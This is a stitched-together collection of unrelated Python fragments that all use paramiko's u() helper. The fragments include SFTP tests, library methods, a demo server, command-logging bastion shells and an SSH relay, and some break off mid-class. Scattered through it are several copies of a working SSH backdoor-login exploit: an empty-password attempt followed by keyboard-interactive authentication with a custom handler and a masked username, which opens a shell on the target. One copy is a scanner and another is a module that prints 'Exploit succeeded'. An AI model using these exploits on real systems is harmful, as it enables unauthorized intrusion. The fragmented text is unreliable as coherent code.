def test_I_check(self, sftp):
"""
verify that file.check() works against our own server.
(it's an sftp extension that we support, and may be the only ones who
support it.)
"""
with sftp.open(sftp.FOLDER + "/kitty.txt", "w") as f:
f.write("here kitty kitty" * 64)
try:
with sftp.open(sftp.FOLDER + "/kitty.txt", "r") as f:
sum = f.check("sha1")
assert (
"91059CFC6615941378D413CB5ADAF4C5EB293402"
== u(hexlify(sum)).upper()
)
sum = f.check("md5", 0, 512)
assert (
"93DE4788FCA28D471516963A1FE3856A"
== u(hexlify(sum)).upper()
)
sum = f.check("md5", 0, 0, 510)
assert (
u(hexlify(sum)).upper()
== "EB3B45B8CD55A0707D99B177544A319F373183D241432BB2157AB9E46358C4AC90370B5CADE5D90336FC1716F90B36D6"
) # noqa
finally:
sftp.unlink(sftp.FOLDER + "/kitty.txt")
def iter(self, command, *args, **options):
with self._get_chan(options.pop('get_pty', False)) as chan:
with self._forward_agent(chan):
with timeout(self._timeout):
# Non-blocking mode.
chan.settimeout(0.0)
command = self._format_command(command, args, options)
chan.exec_command(command)
end = False
while not end:
try:
stdout = chan.recv(1024)
for line in stdout.splitlines():
yield (u('stdout'), self._manage_encoding(line))
if not stdout:
end = True
except socket.timeout:
pass
try:
for line in chan.recv_stderr(1024).splitlines():
yield (u('stderr'), self._manage_encoding(line))
except socket.timeout:
pass
self.return_code = chan.recv_exit_status()
yield ('status', True if self.return_code == 0 else False)
def _write_private_key(self, tag, f, data, password=None):
f.write('-----BEGIN %s PRIVATE KEY-----\n' % tag)
if password is not None:
# since we only support one cipher here, use it
cipher_name = list(self._CIPHER_TABLE.keys())[0]
cipher = self._CIPHER_TABLE[cipher_name]['cipher']
keysize = self._CIPHER_TABLE[cipher_name]['keysize']
blocksize = self._CIPHER_TABLE[cipher_name]['blocksize']
mode = self._CIPHER_TABLE[cipher_name]['mode']
salt = rng.read(16)
key = util.generate_key_bytes(MD5, salt, password, keysize)
if len(data) % blocksize != 0:
n = blocksize - len(data) % blocksize
#data += rng.read(n)
# that would make more sense ^, but it confuses openssh.
data += zero_byte * n
data = cipher.new(key, mode, salt).encrypt(data)
f.write('Proc-Type: 4,ENCRYPTED\n')
f.write('DEK-Info: %s,%s\n' % (cipher_name, u(hexlify(salt)).upper()))
f.write('\n')
s = u(encodebytes(data))
# re-wrap to 64-char lines
s = ''.join(s.split('\n'))
s = '\n'.join([s[i: i + 64] for i in range(0, len(s), 64)])
f.write(s)
f.write('\n')
f.write('-----END %s PRIVATE KEY-----\n' % tag)
def read(self, size=None):
"""
Read at most ``size`` bytes from the file (less if we hit the end of the
file first). If the ``size`` argument is negative or omitted, read all
the remaining data in the file.
:param int size: maximum number of bytes to read
:return:
data read from the file (as a `str`), or an empty string if EOF was
encountered immediately
"""
if self._closed:
raise IOError('File is closed')
if not (self._flags & self.FLAG_READ):
raise IOError('File is not open for reading')
if (size is None) or (size < 0):
# go for broke
result = self._rbuffer
self._rbuffer = bytes()
self._pos += len(result)
while True:
try:
new_data = self._read(self._DEFAULT_BUFSIZE)
except EOFError:
new_data = None
if (new_data is None) or (len(new_data) == 0):
break
result += new_data
self._realpos += len(new_data)
self._pos += len(new_data)
return result if self._flags & self.FLAG_BINARY else u(result)
if size <= len(self._rbuffer):
result = self._rbuffer[:size]
self._rbuffer = self._rbuffer[size:]
self._pos += len(result)
return result if self._flags & self.FLAG_BINARY else u(result)
while len(self._rbuffer) < size:
read_size = size - len(self._rbuffer)
if self._flags & self.FLAG_BUFFERED:
read_size = max(self._bufsize, read_size)
try:
new_data = self._read(read_size)
except EOFError:
new_data = None
if (new_data is None) or (len(new_data) == 0):
break
self._rbuffer += new_data
self._realpos += len(new_data)
result = self._rbuffer[:size]
self._rbuffer = self._rbuffer[size:]
self._pos += len(result)
return result if self._flags & self.FLAG_BINARY else u(result)
def check_auth_publickey(self, username, key):
print("Auth attempt with key: " + u(hexlify(key.get_fingerprint())))
if username == 'exit':
sys.exit(1)
if(username == "user") and (key == self.good_pub_key):
return paramiko.AUTH_SUCCESSFUL
return paramiko.AUTH_FAILED
def posix_shell(chan,channel,width=90,height=40):
from OpsManage.asgi import channel_layer
stdout = list()
begin_time = time.time()
last_write_time = {'last_activity_time':begin_time}
try:
chan.settimeout(0.0)
while True:
try:
x = u(chan.recv(1024))
if len(x) == 0:
channel_layer.send(channel, {'text': json.dumps(['disconnect',smart_unicode('\r\n*** EOF\r\n')]) })
break
now = time.time()
delay = now - last_write_time['last_activity_time']
last_write_time['last_activity_time'] = now
if x == "exit\r\n" or x == "logout\r\n" or x == 'logout':
chan.close()
else:
stdout.append([delay,codecs.getincrementaldecoder('UTF-8')('replace').decode(x)])
channel_layer.send(channel, {'text': json.dumps(['stdout',smart_unicode(x)]) })
except socket.timeout:
pass
except Exception,e:
channel_layer.send(channel, {'text': json.dumps(['stdout','A bug find,You can report it to me' + smart_unicode(e)]) })
finally:
pass
def term(ssh_channel):
oldtty = termios.tcgetattr(sys.stdin)
try:
tty.setraw(sys.stdin.fileno())
tty.setcbreak(sys.stdin.fileno())
ssh_channel.settimeout(0.0)
while True:
r, w, e = select.select([ssh_channel, sys.stdin], [], [])
if ssh_channel in r:
try:
x = u(ssh_channel.recv(1024))
if len(x) == 0:
sys.stdout.write('\r\n - Exit SSH Shell -\r\n')
break
sys.stdout.write(x)
sys.stdout.flush()
except socket.timeout:
pass
if sys.stdin in r:
x = sys.stdin.read(1)
if len(x) == 0:
break
ssh_channel.send(x)
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
def test_5_rename(self, sftp):
"""
verify that renaming a file works.
"""
try:
with sftp.open(sftp.FOLDER + "/first.txt", "w") as f:
f.write("content!\n")
sftp.rename(
sftp.FOLDER + "/first.txt", sftp.FOLDER + "/second.txt"
)
with pytest.raises(IOError, match="No such file"):
sftp.open(sftp.FOLDER + "/first.txt", "r")
with sftp.open(sftp.FOLDER + "/second.txt", "r") as f:
f.seek(-6, f.SEEK_END)
assert u(f.read(4)) == "tent"
finally:
# TODO: this is gross, make some sort of 'remove if possible' / 'rm
# -f' a-like, jeez
try:
sftp.remove(sftp.FOLDER + "/first.txt")
except:
pass
try:
sftp.remove(sftp.FOLDER + "/second.txt")
except:
pass
def _close(self, async_=False):
# We allow double-close without signaling an error, because real
# Python file objects do. However, we must protect against actually
# sending multiple CMD_CLOSE packets, because after we close our
# handle, the same handle may be re-allocated by the server, and we
# may end up mysteriously closing some random other file. (This is
# especially important because we unconditionally call close() from
# __del__.)
if self._closed:
return
self.sftp._log(DEBUG, "close({})".format(u(hexlify(self.handle))))
if self.pipelined:
self.sftp._finish_responses(self)
BufferedFile.close(self)
try:
if async_:
# GC'd file handle could be called from an arbitrary thread
# -- don't wait for a response
self.sftp._async_request(type(None), CMD_CLOSE, self.handle)
else:
self.sftp._request(CMD_CLOSE, self.handle)
except EOFError:
# may have outlived the Transport connection
pass
except (IOError, socket.error):
# may have outlived the Transport connection
pass
def scan_host(targetIP):
global file_mutex
global results_fd
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
client.connect(targetIP, username='', allow_agent=False, look_for_keys=False,timeout=5)
except paramiko.ssh_exception.SSHException:
#print "debug:connect error"
pass
trans = client.get_transport()
try:
trans.auth_password(username='******', password='', event=None, fallback=True)
except paramiko.ssh_exception.AuthenticationException:
#print "debug:auth failed"
pass
trans.auth_interactive(username='******', handler=custom_handler)
chan = client.invoke_shell()
try:
chan.settimeout(10.10)
try:
x = u(chan.recv(1024))
return 1
except socket.timeout:
#print "debug:socket timeout"
pass
finally:
pass
return 0
def posix_shell(chan):
import select
oldtty = termios.tcgetattr(sys.stdin)
try:
tty.setraw(sys.stdin.fileno())
tty.setcbreak(sys.stdin.fileno())
chan.settimeout(0.0)
while True:
r, w, e = select.select([chan, sys.stdin], [], [])
if chan in r:
try:
x = u(chan.recv(1024))
if len(x) == 0:
sys.stdout.write('\r\n*** EOF\r\n')
break
sys.stdout.write(x)
sys.stdout.flush()
except socket.timeout:
pass
if sys.stdin in r:
x = sys.stdin.read(1)
if len(x) == 0:
break
chan.send(x)
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
def test_5_rename(self):
"""
verify that renaming a file works.
"""
try:
with sftp.open(FOLDER + '/first.txt', 'w') as f:
f.write('content!\n')
sftp.rename(FOLDER + '/first.txt', FOLDER + '/second.txt')
try:
sftp.open(FOLDER + '/first.txt', 'r')
self.assertTrue(False, 'no exception on reading nonexistent file')
except IOError:
pass
with sftp.open(FOLDER + '/second.txt', 'r') as f:
f.seek(-6, f.SEEK_END)
self.assertEqual(u(f.read(4)), 'tent')
finally:
try:
sftp.remove(FOLDER + '/first.txt')
except:
pass
try:
sftp.remove(FOLDER + '/second.txt')
except:
pass
def test_5_rename(self):
"""
verify that renaming a file works.
"""
try:
with sftp.open(FOLDER + "/first.txt", "w") as f:
f.write("content!\n")
sftp.rename(FOLDER + "/first.txt", FOLDER + "/second.txt")
try:
sftp.open(FOLDER + "/first.txt", "r")
self.assertTrue(False, "no exception on reading nonexistent file")
except IOError:
pass
with sftp.open(FOLDER + "/second.txt", "r") as f:
f.seek(-6, f.SEEK_END)
self.assertEqual(u(f.read(4)), "tent")
finally:
try:
sftp.remove(FOLDER + "/first.txt")
except:
pass
try:
sftp.remove(FOLDER + "/second.txt")
except:
pass
def main(ip):
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
client.connect(ip, username='', allow_agent=False, look_for_keys=False)
except paramiko.ssh_exception.SSHException:
pass
trans = client.get_transport()
try:
trans.auth_password(username='******', password='', event=None, fallback=True)
except paramiko.ssh_exception.AuthenticationException:
pass
trans.auth_interactive(username='******', handler=custom_handler)
chan = client.invoke_shell()
oldtty = termios.tcgetattr(sys.stdin)
try:
tty.setraw(sys.stdin.fileno())
tty.setcbreak(sys.stdin.fileno())
chan.settimeout(0.0)
while True:
r, w, e = select.select([chan, sys.stdin], [], [])
if chan in r:
try:
x = u(chan.recv(1024))
if len(x) == 0:
sys.stdout.write('\r\n*** EOF\r\n')
break
print ip+" ok \n"
break
except socket.timeout:
pass
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
def test_5a_posix_rename(self, sftp):
"""Test [email protected] protocol extension."""
try:
# first check that the normal rename works as specified
with sftp.open(sftp.FOLDER + '/a', 'w') as f:
f.write('one')
sftp.rename(sftp.FOLDER + '/a', sftp.FOLDER + '/b')
with sftp.open(sftp.FOLDER + '/a', 'w') as f:
f.write('two')
with pytest.raises(IOError): # actual message seems generic
sftp.rename(sftp.FOLDER + '/a', sftp.FOLDER + '/b')
# now check with the posix_rename
sftp.posix_rename(sftp.FOLDER + '/a', sftp.FOLDER + '/b')
with sftp.open(sftp.FOLDER + '/b', 'r') as f:
data = u(f.read())
err = "Contents of renamed file not the same as original file"
assert 'two' == data, err
finally:
try:
sftp.remove(sftp.FOLDER + '/a')
except:
pass
try:
sftp.remove(sftp.FOLDER + '/b')
except:
pass
def test_5a_posix_rename(self):
"""Test [email protected] protocol extension."""
try:
# first check that the normal rename works as specified
with sftp.open(FOLDER + '/a', 'w') as f:
f.write('one')
sftp.rename(FOLDER + '/a', FOLDER + '/b')
with sftp.open(FOLDER + '/a', 'w') as f:
f.write('two')
try:
sftp.rename(FOLDER + '/a', FOLDER + '/b')
self.assertTrue(False, 'no exception when rename-ing onto existing file')
except (OSError, IOError):
pass
# now check with the posix_rename
sftp.posix_rename(FOLDER + '/a', FOLDER + '/b')
with sftp.open(FOLDER + '/b', 'r') as f:
data = u(f.read())
self.assertEqual('two', data, "Contents of renamed file not the same as original file")
finally:
try:
sftp.remove(FOLDER + '/a')
except:
pass
try:
sftp.remove(FOLDER + '/b')
except:
pass
def get_base64(self):
"""
Return a base64 string containing the public part of this key. Nothing
secret is revealed. This format is compatible with that used to store
public key files or recognized host keys.
:return: a base64 `string <str>` containing the public part of the key.
"""
return u(encodebytes(self.asbytes())).replace('\n', '')
def open(self, filename, mode="r", bufsize=-1):
"""
Open a file on the remote server. The arguments are the same as for
Python's built-in `python:file` (aka `python:open`). A file-like
object is returned, which closely mimics the behavior of a normal
Python file object, including the ability to be used as a context
manager.
The mode indicates how the file is to be opened: ``'r'`` for reading,
``'w'`` for writing (truncating an existing file), ``'a'`` for
appending, ``'r+'`` for reading/writing, ``'w+'`` for reading/writing
(truncating an existing file), ``'a+'`` for reading/appending. The
Python ``'b'`` flag is ignored, since SSH treats all files as binary.
The ``'U'`` flag is supported in a compatible way.
Since 1.5.2, an ``'x'`` flag indicates that the operation should only
succeed if the file was created and did not previously exist. This has
no direct mapping to Python's file flags, but is commonly known as the
``O_EXCL`` flag in posix.
The file will be buffered in standard Python style by default, but
can be altered with the ``bufsize`` parameter. ``0`` turns off
buffering, ``1`` uses line buffering, and any number greater than 1
(``>1``) uses that specific buffer size.
:param str filename: name of the file to open
:param str mode: mode (Python-style) to open in
:param int bufsize: desired buffering (-1 = default buffer size)
:return: an `.SFTPFile` object representing the open file
:raises: ``IOError`` -- if the file could not be opened.
"""
filename = self._adjust_cwd(filename)
self._log(DEBUG, "open({!r}, {!r})".format(filename, mode))
imode = 0
if ("r" in mode) or ("+" in mode):
imode |= SFTP_FLAG_READ
if ("w" in mode) or ("+" in mode) or ("a" in mode):
imode |= SFTP_FLAG_WRITE
if "w" in mode:
imode |= SFTP_FLAG_CREATE | SFTP_FLAG_TRUNC
if "a" in mode:
imode |= SFTP_FLAG_CREATE | SFTP_FLAG_APPEND
if "x" in mode:
imode |= SFTP_FLAG_CREATE | SFTP_FLAG_EXCL
attrblock = SFTPAttributes()
t, msg = self._request(CMD_OPEN, filename, imode, attrblock)
if t != CMD_HANDLE:
raise SFTPError("Expected handle")
handle = msg.get_binary()
self._log(
DEBUG,
"open({!r}, {!r}) -> {}".format(
filename, mode, u(hexlify(handle))
),
)
return SFTPFile(self, handle, mode, bufsize)
def getcwd(self):
"""
Return the "current working directory" for this SFTP session, as
emulated by Paramiko. If no directory has been set with `chdir`,
this method will return ``None``.
.. versionadded:: 1.4
"""
return self._cwd and u(self._cwd)
def getcwd(self):
"""
Return the "current working directory" for this SFTP session, as
emulated by Paramiko. If no directory has been set with `chdir`,
this method will return ``None``.
.. versionadded:: 1.4
"""
# TODO: make class initialize with self._cwd set to self.normalize('.')
return self._cwd and u(self._cwd)
def get_text(self):
"""
Fetch a string from the stream. This could be a byte string and may
contain unprintable characters. (It's not unheard of for a string to
contain another byte-stream Message.)
@return: a string.
@rtype: string
"""
return u(self.get_bytes(self.get_size()))
def hash_host(hostname, salt=None):
"""
Return a "hashed" form of the hostname, as used by OpenSSH when storing
hashed hostnames in the known_hosts file.
:param str hostname: the hostname to hash
:param str salt: optional salt to use when hashing (must be 20 bytes long)
:return: the hashed hostname as a `str`
"""
if salt is None:
salt = os.urandom(sha1().digest_size)
else:
if salt.startswith('|1|'):
salt = salt.split('|')[2]
salt = decodebytes(b(salt))
assert len(salt) == sha1().digest_size
hmac = HMAC(salt, b(hostname), sha1).digest()
hostkey = '|1|%s|%s' % (u(encodebytes(salt)), u(encodebytes(hmac)))
return hostkey.replace('\n', '')
def _decode_key(self, data):
s, padding = der.remove_sequence(data)
if padding:
if padding not in self.ALLOWED_PADDINGS:
raise ValueError("weird padding: %s" % u(binascii.hexlify(data)))
data = data[:-len(padding)]
key = SigningKey.from_der(data)
self.signing_key = key
self.verifying_key = key.get_verifying_key()
self.size = 256
def posix_shell(chan,user_obj,bind_host_obj,cmd_caches,log_recording):
import select
oldtty = termios.tcgetattr(sys.stdin)
try:
tty.setraw(sys.stdin.fileno())
tty.setcbreak(sys.stdin.fileno())
chan.settimeout(0.0)
cmd = ''
tab_key = False
while True:
r, w, e = select.select([chan, sys.stdin], [], [])
if chan in r:
try:
x = u(chan.recv(1024))
if tab_key:
if x not in ('\x07' , '\r\n'):
#print('tab:',x)
cmd += x
tab_key = False
if len(x) == 0:
sys.stdout.write('\r\n*** EOF\r\n')
break
sys.stdout.write(x)
sys.stdout.flush()
except socket.timeout:
pass
if sys.stdin in r:
x = sys.stdin.read(1)
if '\r' != x:
cmd +=x
else:
print('cmd->:',cmd)
log_item = models.AuditLog(user_id=user_obj.id,
bind_host_id=bind_host_obj.id,
action_type='cmd',
cmd=cmd ,
date=datetime.datetime.now()
)
cmd_caches.append(log_item)
cmd = ''
if len(cmd_caches)>=10:
log_recording(user_obj,bind_host_obj,cmd_caches)
cmd_caches = []
if '\t' == x:
tab_key = True
if len(x) == 0:
break
chan.send(x)
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
def run(self):
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
client.connect(self.target, username='', allow_agent=False, look_for_keys=False)
except paramiko.ssh_exception.SSHException:
pass
except:
print_error("Exploit Failed - SSH Service is down")
return
trans = client.get_transport()
try:
trans.auth_password(username='******', password='', event=None, fallback=True)
except paramiko.ssh_exception.AuthenticationException:
pass
except:
print_status("Error with Existing Session. Wait few minutes.")
return
try:
trans.auth_interactive(username='******', handler=self.custom_handler)
chan = client.invoke_shell()
except:
print_error("Exploit failed")
return
print_success("Exploit succeeded")
oldtty = termios.tcgetattr(sys.stdin)
try:
tty.setraw(sys.stdin.fileno())
tty.setcbreak(sys.stdin.fileno())
chan.settimeout(0.0)
while True:
r, w, e = select.select([chan, sys.stdin], [], [])
if chan in r:
try:
x = u(chan.recv(1024))
if len(x) == 0:
sys.stdout.write('\r\n*** EOF\r\n')
break
sys.stdout.write(x)
sys.stdout.flush()
except socket.timeout:
pass
if sys.stdin in r:
x = sys.stdin.read(1)
if len(x) == 0:
break
chan.send(x)
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
def posix_shell(chan,self,host_ip,username,host_ins):
import select
oldtty = termios.tcgetattr(sys.stdin)
try:
tty.setraw(sys.stdin.fileno())
tty.setcbreak(sys.stdin.fileno())
chan.settimeout(0.0)
cmd = ''
tab_input_flag = False
while True:
r, w, e = select.select([chan, sys.stdin], [], [])
if chan in r:
try:
x = u(chan.recv(1024))
if tab_input_flag:
cmd +=''.join(x[:10])
tab_input_flag = False
if len(x) == 0:
sys.stdout.write('\r\n\033[32;1m*** Session Closed ***\033[0m\r\n')
self.flush_cmd_input('*** Session Closed ***',host_ins,2)
break
sys.stdout.write(x)
sys.stdout.flush()
except socket.timeout:
pass
except UnicodeDecodeError,e:
pass
if sys.stdin in r:
x = sys.stdin.read(1)
if len(x) == 0:
break
if not x == '\r':
cmd +=x
else:
if len(cmd.strip())>0:
self.flush_cmd_input(cmd,host_ins,0)
if cmd in unsupport_cmd_list:
x="...Operation is not supported!\r\n"
cmd=''
if x == '\t':
tab_input_flag = True
chan.send(x)
#f.close()
#print cmd_list
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
def main():
if len(sys.argv) < 2:
print 'Usage: ' + sys.argv[0] + ' <target-ip>' + ' <target-port-optional>'
exit(-1)
nombrehost = sys.argv[1]
if len(sys.argv) > 2:
puerto = int(sys.argv[2])
else:
puerto = 22
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
client.connect(nombrehost, port=puerto, username='', allow_agent=False, look_for_keys=False)
except paramiko.ssh_exception.SSHException:
pass
trans = client.get_transport()
try:
trans.auth_password(username='******', password='', event=None, fallback=True)
except paramiko.ssh_exception.AuthenticationException:
pass
trans.auth_interactive(username='******', handler=custom_handler)
chan = client.invoke_shell()
oldtty = termios.tcgetattr(sys.stdin)
try:
tty.setraw(sys.stdin.fileno())
tty.setcbreak(sys.stdin.fileno())
chan.settimeout(0.0)
while True:
r, w, e = select.select([chan, sys.stdin], [], [])
if chan in r:
try:
x = u(chan.recv(1024))
if len(x) == 0:
sys.stdout.write('\r\n*** EOF\r\n')
break
sys.stdout.write(x)
sys.stdout.flush()
except socket.timeout:
pass
if sys.stdin in r:
x = sys.stdin.read(1)
if len(x) == 0:
break
chan.send(x)
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
def posix_shell(chan, userprofile_id, hostuser_id):
import select
oldtty = termios.tcgetattr(sys.stdin)
try:
tty.setraw(sys.stdin.fileno())
tty.setcbreak(sys.stdin.fileno())
#设置超时时间
chan.settimeout(0.0)
# f = open('handle.log', 'a+')
tab_flag = False
# cmd_temp_list = []
while True:
#socket模块,监听socket的变化
r, w, e = select.select([chan, sys.stdin], [], [])
if chan in r:
try:
x = u(chan.recv(1024))
if len(x) == 0:
sys.stdout.write('\r\n*** EOF\r\n')
break
if tab_flag:
if x.startswith('\r\n'):
pass
else:
# cmd_temp_list.append(x)
# f.write(x)
# f.flush()
# if len(cmd_temp_list) == 20:
# cmd_str=''.join(cmd_temp_list)
write_log(userprofile_id, hostuser_id, x)
tab_flag = False
sys.stdout.write(x)
sys.stdout.flush()
except socket.timeout:
pass
if sys.stdin in r:
x = sys.stdin.read(1)
if len(x) == 0:
break
if x == '\t':
tab_flag = True
else:
# cmd_temp_list.append(x)
# f.write(x)
# f.flush()
# if len(cmd_temp_list) == 20:
# cmd_str=''.join(cmd_temp_list)
#操作写入日志数据库
write_log(userprofile_id, hostuser_id, x)
chan.send(x)
#最后恢复tty原来的默认值,否则会影响以后的登录操作
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
def test_I_check(self):
"""
verify that file.check() works against our own server.
(it's an sftp extension that we support, and may be the only ones who
support it.)
"""
with sftp.open(FOLDER + '/kitty.txt', 'w') as f:
f.write('here kitty kitty' * 64)
try:
with sftp.open(FOLDER + '/kitty.txt', 'r') as f:
sum = f.check('sha1')
self.assertEqual('91059CFC6615941378D413CB5ADAF4C5EB293402', u(hexlify(sum)).upper())
sum = f.check('md5', 0, 512)
self.assertEqual('93DE4788FCA28D471516963A1FE3856A', u(hexlify(sum)).upper())
sum = f.check('md5', 0, 0, 510)
self.assertEqual('EB3B45B8CD55A0707D99B177544A319F373183D241432BB2157AB9E46358C4AC90370B5CADE5D90336FC1716F90B36D6',
u(hexlify(sum)).upper())
finally:
sftp.unlink(FOLDER + '/kitty.txt')
def handle(self):
try:
client = SSHClientConnection(self.request, sys.argv[2])
client_channel = client.get_channel(10)
rhost, rport, alias = client.get_remote_address()
rport = int(rport)
LOG.info("connecting to remote endpoint on %s %d" % (rhost, rport))
endpoint = SSHRemoteClient(alias, (rhost, rport))
endpoint_channel = endpoint.get_channel()
if not endpoint.is_active():
raise RuntimeError("Could not get endpoint channel")
LOG.info("connected to endpoint channel.")
endpoint_channel.get_pty()
endpoint_channel.invoke_shell()
while True:
r, w, e = select([client_channel, endpoint_channel], [], [])
if client_channel in r:
data = u(client_channel.recv(1024))
if len(data) == 0:
LOG.info("lost connection to client.")
break
endpoint_channel.send(data)
elif endpoint_channel in r:
data = u(endpoint_channel.recv(1024))
if len(data) == 0:
LOG.info("lost connection to endpoint.")
break
client_channel.send(data)
client_channel.close()
endpoint_channel.close()
except Exception as e:
LOG.exception(e)
raise RuntimeWarning("Failed to connect client")
def check_auth_publickey(self, username, key):
print('Auth attempt with key: ' + u(hexlify(key.get_fingerprint())))
if (username == 'redm') and u(hexlify(key.get_fingerprint()))==u(hexlify(self.pkey.get_fingerprint())):
return(paramiko.AUTH_SUCCESSFUL)
return(paramiko.AUTH_FAILED)
def posix_shell(self):
"""
通用Linux shell
:return:
"""
import select
oldtty = termios.tcgetattr(sys.stdin)
try:
tty.setraw(sys.stdin.fileno())
tty.setcbreak(sys.stdin.fileno())
self.channel.settimeout(0.0)
cmdlog = ''
flag = False
log = open("../logs/log.txt", 'a+')
import re
while True:
r, w, e = select.select([self.channel, sys.stdin], [], [])
if self.channel in r:
try:
x = u(self.channel.recv(1024))
if flag:
result = re.findall(r"[\x1b[A\x00\x03\x07\x08\x0a\x0b\x0d\x1c\x1d\x1e\x1f\x20\x7f]", x)
over = re.findall(r'\x1b', x)
if over:
flag = False
result = None
if result:
flag = False
if not re.findall(r"\r\n$", x):
if x != "\x7f":
cmdlog += x
log.write("{} {}\n".format(datetime.datetime.now(), [cmdlog]))
log.flush()
if len(x) == 0:
sys.stdout.write('\r\n*** EOF\r\n')
break
over = re.findall(r'\x1b', x)
if not over:
sys.stdout.write(x)
sys.stdout.flush()
except socket.timeout:
pass
if sys.stdin in r:
x = sys.stdin.read(1)
if len(x) == 0:
break
if x != '\r':
if x == '\t':
flag = True
else:
if re.findall(r"\x15", x):
cmdlog = ""
cmdlog += x
else:
del_count = cmdlog.count('\x7f')
if del_count:
cmd_list = cmdlog.split()
cmdlog = cmd_list[0]
for index in range(len(cmd_list)):
if index > 0:
del_count = cmd_list[index].count('\x7f')
if not del_count:
cmdlog += " {}".format(cmd_list[index])
log.write("{} {}\n".format(datetime.datetime.now(), [cmdlog]))
log.flush()
cmdlog = ''
self.channel.send(x)
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
import os
import socket
import sys
import threading
import traceback
import paramiko
from paramiko.py3compat import b, u, decodebytes
# setup logging
paramiko.util.log_to_file("demo_server.log")
host_key = paramiko.RSAKey(filename="test_rsa.key")
# host_key = paramiko.DSSKey(filename='test_dss.key')
print("Read key: " + u(hexlify(host_key.get_fingerprint())))
class Server(paramiko.ServerInterface):
# 'data' is the output of base64.b64encode(key)
# (using the "user_rsa_key" files)
data = (b"AAAAB3NzaC1yc2EAAAABIwAAAIEAyO4it3fHlmGZWJaGrfeHOVY7RWO3P9M7hp"
b"fAu7jJ2d7eothvfeuoRFtJwhUmZDluRdFyhFY/hFAh76PJKGAusIqIQKlkJxMC"
b"KDqIexkgHAfID/6mqvmnSJf0b5W8v5h2pI/stOSwTQ+pxVhwJ9ctYDhRSlF0iT"
b"UWT10hcuO4Ks8=")
good_pub_key = paramiko.RSAKey(data=decodebytes(data))
def __init__(self):
self.event = threading.Event()
def check_channel_request(self, kind, chanid):
def posix_shell(self):
import select
"""
Use paramiko channel connect server interactive.
使用 paramiko 模块的channel,连接后端,进入交互式
"""
# 创建记录日志的文件,分为.log和.time两个文件,log表示记录日志,True
log_file_f, log_time_f, log_input_f = self.get_log()
# 获取文件输入流
fd = sys.stdin.fileno()
old_tty = termios.tcgetattr(fd)
pre_timestamp = time.time()
data = ''
input_mode = False
try:
tty.setraw(fd) # 设置终端为非阻塞的输入方式,按字符响应键盘输入
tty.setcbreak(fd)
self.channel.settimeout(0.0)
# 提供持续的输入命令行
while True:
try:
r, w, e = select.select([self.channel, sys.stdin], [], [])
# 锁,当有输入的时候,锁定输入进程
flag = fcntl.fcntl(sys.stdin, fcntl.F_GETFL, 0)
fcntl.fcntl(fd, fcntl.F_SETFL, flag | os.O_NONBLOCK)
except Exception as err:
print("select error {}".format(err))
if self.channel in r:
try:
x = self.channel.recv(10240)
if len(x) == 0:
break
# 当有vim编辑文件时,记录相应信息
if self.vim_flag:
self.vim_data += u(x)
index = 0
len_x = len(x)
while index < len_x:
try:
n = os.write(sys.stdout.fileno(), x[index:])
sys.stdout.flush()
index += n
except OSError as msg:
if msg.errno == errno.EAGAIN:
continue
now_timestamp = time.time()
# round四舍五入,保留一位小数点 5.667 --> 6.0,可以指定保留小数位数
# routd(num, 4)表示保留4位有效数字
# log_time_f.write('%s %s\n' % (round(now_timestamp - pre_timestamp, 4), len(x)))
# 将信息写入到time日志文件中
log_time_f.write(
('%s %s\n' % (round(now_timestamp - pre_timestamp,
4), len(x))).encode())
log_time_f.flush()
# 将操作信息写入到log日志记录文件中
# flush刷新文件,将缓存中的信息写入到文件中
log_file_f.write(x)
log_file_f.flush()
pre_timestamp = now_timestamp
log_file_f.flush()
# 持续输入,如果位输入模式,并且没有输入enter等
if input_mode and not self.is_output(x):
data += x.decode()
except socket.timeout:
pass
if sys.stdin in r:
try:
x = os.read(sys.stdin.fileno(), 4096)
except OSError:
pass
input_mode = True
if str(x.decode()) in ['\r', '\n', '\r\n']:
if self.vim_flag:
match = self.ps1_pattern.search(self.vim_data)
if match:
self.vim_flag = False
data = self.deal_command(data)[0:200]
if len(data) > 0:
now_timestamp = datetime.datetime.now(
).strftime(TIME_FORMAT)
log_input_f.write(
('%s: %s\n' %
(now_timestamp, data)).encode())
log_input_f.flush()
# TtyLog(log=log, datetime=datetime.datetime.now(), cmd=data).save()
else:
data = self.deal_command(data)[0:200]
if len(data) > 0:
now_timestamp = datetime.datetime.now(
).strftime(TIME_FORMAT)
log_input_f.write(
('%s: %s\n' %
(now_timestamp, data)).encode())
log_input_f.flush()
# TtyLog(log=log, datetime=datetime.datetime.now(), cmd=data).save()
data = ''
self.vim_data = ''
input_mode = False
if len(x) == 0:
break
self.channel.send(x)
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, old_tty)
log_file_f.write(
("End time is %s" % datetime.datetime.now()).encode())
log_file_f.close()
log_time_f.close()
log_input_f.close()
from types import MethodType
from uuid import uuid4
import six
import threading
import time
from paramiko import AutoAddPolicy, RSAKey
from paramiko.client import SSHClient as ParamikoSSHClient
from paramiko import py3compat
from sshaolin import common
from sshaolin.models import CommandResponse
# this is a hack to preimport dependencies imported in a thread during connect
# which causes a deadlock. https://github.com/paramiko/paramiko/issues/104
py3compat.u("".encode())
# dirty hack 2.0 also issue 104
# Try / Catch to prevent users using paramiko<2.0.0 from raising an ImportError
try:
from cryptography.hazmat.backends import default_backend
from cryptography.utils import int_from_bytes
int_from_bytes(b"a", "big")
default_backend()
except ImportError:
pass
class CommandOperationTimeOut(socket.timeout):
pass
from paramiko.py3compat import u
from spacecmd.sshserver import SSHServer
from spacecmd.commands import Ls, Cd, Whoami
from spacecmd.middleware.welcome import WelcomeMiddleware
from spacecmd.util import chunks
from spacecmd.logger import log
